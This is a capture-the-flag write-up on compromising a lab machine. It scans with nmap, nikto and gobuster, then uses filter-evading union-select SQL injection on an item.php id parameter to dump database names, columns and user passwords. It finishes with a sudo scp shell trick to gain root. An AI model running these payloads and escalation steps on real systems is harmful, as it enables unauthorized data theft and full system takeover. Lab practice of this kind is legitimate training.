Initial foothold
- Port scan
nmap -Pn <target ip>nmap -Pn -p1000- <target ip>
There’re 2 open ports: 22 and 80.
2. OS and service scan
nmap -A -p22,80 <target ip>
There’re 2 services: SSH on port 22 and HTTP on port 80.
3. Vuln scan
nmap --script vuln -p22,80 <target ip>
There’s robots.txt on HTTP service.
Service Enumeration
- SSH
ssh <target ip>
Connecting is succeeded.
2. HTTP service
nikto scan
nikto -h http://<target ip>
Directory scan w/ gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<target>/ -x php,txt,html,sh,cgi,bak -q
Access HTTP site
/index.php
View page source, not much revealed
Follow the link to shop.php
Click on one the choices, I was redirected to /item.php?id=3
/item.php?id=1
Conclusion:
id is a parameter. Maybe I can do SQL injection.
Exploitation
- Intercept item.php w/ Burp Suite and send it to the Intruder
2. Supply the payload and start the attack
Here’s my payload on GitHub.
Looking at the length there’re many values. I will start w/ 407.
Try the query
" or 1=1
Failed!!!
Next is 516, I skipped 408 and 409 because It’s the same request and the length is different due to strings’ size.
' or 1=1#
There’s a filter in this system.
Try 1765
0 or 1=1
No error. Good to go.
3. Test for union injection
Before attacking, I will encode the query w/ Burp Suite’s decoder function.
0 union select
The full request will be:
0 union select 10 union select 1,20 union select 1,2,3
I will add “$” at number position.
Load the payload
Here’s my GitHub link
Start the attack, judging by the length. This machine is also vulnerable to union injection and it needs 5 columns to display the result.
Test the query
0 union select 1,2,3,4,5
Version number
0 union select 1,2,version(),4,5
Database
0 union select 1,2,database(),4,5
Get other databases
0 union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata
There’s only 1 interesting database: park.
Retrieve table names
0 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()
Retrieve column names of table ‘users’
0 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='users' and table_schema=database()
I was filtered.
Change single quite (‘) to double quote (“)
0 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name="users" and table_schema=database()
Retrieve data
0 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name="users" and table_schema=database()
I was filtered. I probably filtered by column name.
Test one by one starting w/ id
0 union select 1,group_concat(id),3,4,5 from users
There’re 2 users.
username
0 union select 1,group_concat(username),3,4,5 from users
I was filtered
password
0 union select 1,group_concat(password),3,4,5 from users
I got 2 passwords.
Before trying to work around w/ ‘username’ filtering. I will retrieve data from tables ‘items’
Column name
0 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name="items" and table_schema=database()
Data
0 union select 1,group_concat(id," ",package," ",price," ",information," ",sold),3,4,5 from items
Copy and arrange it. ID #5 mentioned filtered characters.
/item.php?id=5
There’s s massage to Dennis.
Until now, there’re 2 possible usernames: dennis and Dennis
3. Try to log in w/ ssh starting w/ username: dennis and both of the passwords.
Privilege Escaltion
- Verify sudo
sudo -l
I can escalate w/
Here’s the command
TF=$(mktemp)echo 'sh 0<&2 1>&2' > $TFchmod 777 "$TF"sudo scp -S $TF x y:whoami
Now I’m root.
2. Finding flags
1st flag is located in /home/dennis
5th flag is located in /root
2nd flag location is hinted in /home/ubuntu/.bash_history
It’s in /boot/grub/fonts/
3rd flag is written in /home/dennis/.bash_history